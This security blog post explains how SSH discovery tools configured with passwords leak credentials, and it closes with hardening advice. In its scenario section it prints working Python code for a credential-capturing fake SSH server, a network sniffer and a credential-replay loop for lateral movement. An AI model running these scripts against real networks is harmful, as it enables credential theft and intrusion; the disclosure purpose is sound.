Our industry pays lots of attention to vulnerabilities and the need for patching. And yes, there is a need for this. But in the past couple of decades, we’ve over-indexed on vulnerability management. What doesn’t get as much media coverage, and is often more important to an attacker, are things like common misconfigurations or an improper implementation that introduces unintended risk. The ramifications of an improper implementation can be hard for an organization to understand, the issue itself nearly impossible to spot, and even harder to fix.
We regularly encounter improper implementations within our customers’ networks, suggesting many blue-teamers are unaware of the risks of certain configuration methods. As an attacker myself, I can say with confidence that some vendor-recommended implementation strategies are widely abused by red-teamers and attackers to achieve different objectives. The first time I took advantage of something like this was in the early 2000s, and in some cases, off-the-shelf tooling exists to exploit it. Weak configurations like this are a categorical risk to organizations, and I’m hoping that by talking about them, I can help close the knowledge gap between red-teamers and blue-teamers.
I’m going to take you through how vendor-documented implementation methods that are commonly used by IT orgs can introduce unintended risk into your environment, with a focus on a particular type of asset discovery configuration that makes it easy for an attacker like me to move laterally in an organization.
First, a quick definition of lateral movement (if you know what this is, skip ahead). Lateral movement describes the techniques attackers use to move through a network as they explore systems, attempting to gain further access or compromise sensitive information en route to their objectives. In my role as an attacker, I will take advantage of misconfigured systems, default credentials, exploits for unmanaged or unpatched systems, or all of the above. I will use whatever means are available to compromise other systems on the network, or “move” laterally.
Enter asset discovery tools to help with configuration management (CM). Organizations have rightfully started using auto-discovery tools to find services, applications, and devices so they can mitigate these types of exposures before attackers take advantage of them. These tools are meant to give companies a better understanding of what systems are on their network, their patch level, and how those systems are configured. These CM and discovery tools programmatically log into systems and run commands to check their configuration.
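To make that concrete, here’s a minimal sketch of the kind of programmatic SSH login a discovery tool performs, written with the Python paramiko library. The hostname, account name, and commands are illustrative placeholders, not any vendor’s actual implementation.

```python
# Minimal sketch of how an asset discovery tool might probe a host over SSH.
# Host, credentials, and commands are illustrative placeholders only.
import paramiko

def probe_host(host, username, password):
    client = paramiko.SSHClient()
    # Discovery tools typically have to accept previously unseen host keys.
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    client.connect(host, username=username, password=password, timeout=10)

    inventory = {}
    # Run read-only commands to fingerprint the OS, packages, and listening services.
    for label, command in [
        ("os", "uname -a"),
        ("packages", "dpkg -l || rpm -qa"),
        ("listening_ports", "ss -tlnp"),
    ]:
        _, stdout, _ = client.exec_command(command)
        inventory[label] = stdout.read().decode(errors="replace")

    client.close()
    return inventory
```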
Unfortunately, when configured improperly, these asset discovery tools can increase an organization’s risk rather than reduce it, by further exposing it to lateral movement by an attacker. Worse yet, these implementation options may even be a documented solution. Therefore, it is important for organizations to understand the risks these configurations introduce and weigh them accordingly. Before publishing this blog, we reached out to each of the vendors in advance to see if they’d be open to updating their documentation to provide clearer guidance on the security risks associated with these configurations. As of the time of publication, none of the vendors named in this blog expressed interest in updating their documentation.
I want to be very clear that ServiceNow Discovery is not vulnerable or bad, nor are Virima or BMC Helix Discovery (other asset discovery tools that suggest similar implementations). In fact, they are very useful and practical tools for IT and security practitioners. And this technique is not new or novel in any way. This is simply a concrete example I have exploited, and it is used here to demonstrate the point. I’d also like to point out that faulty implementation practices don’t just happen with asset discovery solutions; we see this across a variety of IT and security tools. But we’ll save that for a different time.
The Problem
When ServiceNow Discovery, BMC Helix Discovery, or Virima is configured with password credentials rather than a private key, it can be leveraged by an attacker (at relatively low risk) to move laterally. Said another way, the password-credentials configuration method is easy for an attacker to take advantage of. And it’s low risk to a hacker (like me) for a multitude of reasons:
- I don’t have to develop an exploit (which is expensive and takes time).
- I can just sit on the network and it will give me credentials – I don’t have to do any discovery or port scanning.
- I won’t trigger an alert. In many cases, alerts associated with discovery tools are ignored or disabled because they are considered benign (and with good reason).
- I don’t have to brute force entry (which could trigger alerts).
ServiceNow Discovery Example
ServiceNow Discovery explores UNIX and Linux devices using SSH to execute commands on the system in question. In order to run the exploratory commands, “Discovery” must have some sort of credential to access the system. ServiceNow’s documentation describes two ways to configure these credentials: one is username and password, the other is an SSH private key. It is more secure to use SSH private key credentials rather than an SSH password, but password credentials are often preferred because they are easier to configure. In fact, the ServiceNow Discovery documentation does explicitly state: “SSH private key credentials are recommended over SSH password credentials for security reasons.” However, it doesn’t go into detail.
ServiceNow Discovery Documentation
BMC Helix Discovery Documentation
Virima Documentation (the screenshot above is no longer live on their site)
Before we go on to the example, let’s take a moment to explain why private key SSH authentication is more secure than passwords. (If you already know why, skip ahead.) Private key authentication allows an SSH client to authenticate to an SSH server using a cryptographic key instead of a password. With private key authentication, the client proves it holds the key by signing a challenge; the server never sees the private key, and the signature can’t be replayed to authenticate elsewhere. With username/password authentication, the server receives the password itself, so an attacker who can observe or impersonate the server during the login process has everything needed to authenticate as the original client.
People use passwords more than private keys because of the ease of deployment. Simply add an account with a password to the system and you’re done. Private key authentication has the extra steps of generating the key pair, protecting the private key, and copying the public key into place on the server systems.
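For comparison, here’s a rough sketch of what those extra steps look like in practice, again using paramiko. The filenames, hostname, account name, and bootstrap password are placeholders, and a real deployment would typically rely on the tool’s own credential store rather than a script like this.

```python
import paramiko

# 1. Generate a keypair. The private key never leaves the discovery server.
key = paramiko.RSAKey.generate(bits=3072)
key.write_private_key_file("discovery_key")  # lock down filesystem permissions on this file
public_key_line = f"{key.get_name()} {key.get_base64()} discovery-tool"

# 2. One-time bootstrap: append the public key to the service account's
#    authorized_keys on each target host.
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
client.connect("target.example.com", username="discovery", password="bootstrap-only")
_, stdout, _ = client.exec_command(
    f"mkdir -p ~/.ssh && chmod 700 ~/.ssh && "
    f"echo '{public_key_line}' >> ~/.ssh/authorized_keys && "
    "chmod 600 ~/.ssh/authorized_keys"
)
stdout.channel.recv_exit_status()  # wait for the command to finish
client.close()

# 3. From then on, the tool authenticates with the key; it never hands a
#    password to the servers it logs into.
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
client.connect("target.example.com", username="discovery", key_filename="discovery_key")
client.close()
```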
The Scenario
Let’s assume that, as the attacker, I have gained access to a network by compromising a Linux system and am looking to move laterally to other systems. I begin by quietly observing, or sniffing, the network traffic with the goal of gaining situational awareness: figuring out what I can see and what I have access to.
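As a rough illustration of that passive observation step, the sketch below (using scapy, which needs root privileges; the interface name is a placeholder) simply logs any peer that tries to open a connection to port 22 on the compromised host.

```python
from scapy.all import IP, TCP, sniff

def log_inbound_ssh(packet):
    # A bare SYN is a new inbound connection attempt; destination port 22
    # means someone wants to talk SSH to this host.
    if packet[TCP].dport == 22 and packet[TCP].flags == "S":
        print(f"inbound SSH attempt from {packet[IP].src}")

# Watch quietly; store=False keeps memory use flat during a long stakeout.
sniff(iface="eth0", filter="tcp dst port 22", prn=log_inbound_ssh, store=False)
```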
While watching network traffic, I notice an IP address attempting to connect to my compromised system on TCP port 22 (the default port for SSH servers). So, I know somebody or something is attempting to log in via SSH. I quickly spin up an SSH server I control and wait. Eventually, the something that logs in is the aforementioned asset discovery system, presenting a plaintext username and password.
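The “SSH server I control” can be as simple as the sketch below: a paramiko-based server that advertises password authentication, records whatever username and password the client offers, and then rejects the login. The host key and port binding are placeholders, and this is only an illustration of the technique, not a polished tool.

```python
import socket
import paramiko

class CredentialLogger(paramiko.ServerInterface):
    def get_allowed_auths(self, username):
        # Advertise password auth so the client sends its password.
        return "password"

    def check_auth_password(self, username, password):
        # This is the whole point: the credential arrives here in plaintext.
        print(f"captured credentials: {username} / {password}")
        return paramiko.AUTH_FAILED  # reject, so we never have to fake a session

# Throwaway host key for the fake server; automated clients frequently accept
# unknown host keys, just as discovery tools often must.
host_key = paramiko.RSAKey.generate(2048)

listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
listener.bind(("0.0.0.0", 22))  # requires root and no real sshd on this port
listener.listen(5)

while True:
    conn, _addr = listener.accept()
    transport = paramiko.Transport(conn)
    transport.add_server_key(host_key)
    transport.start_server(server=CredentialLogger())
    transport.accept(timeout=30)  # wait out the client's authentication attempt
    transport.close()
```

Because the login simply fails, the discovery tool will often just record a failed credential or unreachable host and move on, which is rarely something anyone investigates.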
Often the username for these types of asset discovery tools references the product in some way, for instance `ServiceNowUser`. Armed with just that information, I know those credentials likely work on other *nix systems (UNIX, macOS, FreeBSD, Linux) and that users are trained to ignore logins from that account.
Now I’m off to the races: I can use the leaked credentials to move laterally to other systems on the network, with little operational risk. And because those credentials are used to verify patch states and system configurations, I also have access to that data on each system, giving me a lot more information to do my job easily and stealthily.
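The lateral movement itself then looks something like the sketch below: replaying the captured credential against other hosts seen on the network. The host list and credential values are illustrative placeholders; in practice the loop would be driven by the hosts observed during the sniffing step, not a hard-coded list.

```python
import paramiko

# Placeholders: in reality these come from the credential capture and sniffing steps.
captured_user, captured_password = "ServiceNowUser", "captured-password"
candidate_hosts = ["10.0.1.20", "10.0.1.21", "10.0.1.22"]

for host in candidate_hosts:
    client = paramiko.SSHClient()
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    try:
        client.connect(host, username=captured_user, password=captured_password, timeout=5)
    except (paramiko.AuthenticationException, OSError):
        continue  # credential didn't work here, or host unreachable; move on quietly
    # The same read-only commands the discovery tool runs now tell the attacker
    # the patch level and configuration of each newly reachable host.
    _, stdout, _ = client.exec_command("uname -a")
    print(host, stdout.read().decode(errors="replace").strip())
    client.close()
```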
Takeaways
For anyone implementing a new technology, especially an asset discovery solution, consider taking the extra time to configure it with a private key rather than a password (more on the advantages here). Review documentation thoroughly and pay special attention to best practices. Ask your vendor for more detail on security best practices if it isn’t included in the documentation.
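If you do go the private key route, you can also limit how that key can be used. The sketch below, for example, appends the discovery tool’s public key to authorized_keys with OpenSSH’s `from=` and `restrict` options so the key only works from the discovery server’s address and can’t forward ports or open interactive sessions (verify your tool tolerates these restrictions first, since some products request a PTY). The address, key material, and path are placeholders.

```python
# Illustrative only: constrain where and how the discovery tool's key can be used.
# The source address, key material, and target path are placeholders.
DISCOVERY_SERVER_IP = "10.0.5.10"
PUBLIC_KEY = "ssh-rsa AAAA...placeholder... discovery-tool"

# "from=" limits which source address may use this key; "restrict" (OpenSSH 7.2+)
# disables PTY allocation, port/agent/X11 forwarding, and ~/.ssh/rc execution.
entry = f'from="{DISCOVERY_SERVER_IP}",restrict {PUBLIC_KEY}\n'

with open("/home/discovery/.ssh/authorized_keys", "a") as f:
    f.write(entry)
```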
Some configurations may be quick wins for a project, but be careful: you may inadvertently give away the keys to the kingdom. Sometimes it’s not worth the risk, and it’s better to take on a more thorough implementation for security purposes. The details are important to understanding what risk you are accepting, and that risk needs to be clearly communicated to management, especially if you intend to take the easier route.
For the C-suite: any software used on a network should be viewed as part of the attack surface, and thus must be considered when calculating risk. Purchasing a tool is not the solution to the problem, and may in fact cause more harm than good. You must allow teams the time to understand the ramifications of a product, how to properly implement it, and how to use it in your environment. Recognize the risk you’re taking if you ask your team to implement something on a shorter timeframe; faster often means less secure.
To read more posts like this from the Randori Attack Team, check out their ongoing TTP series (Tools, Techniques & POCs).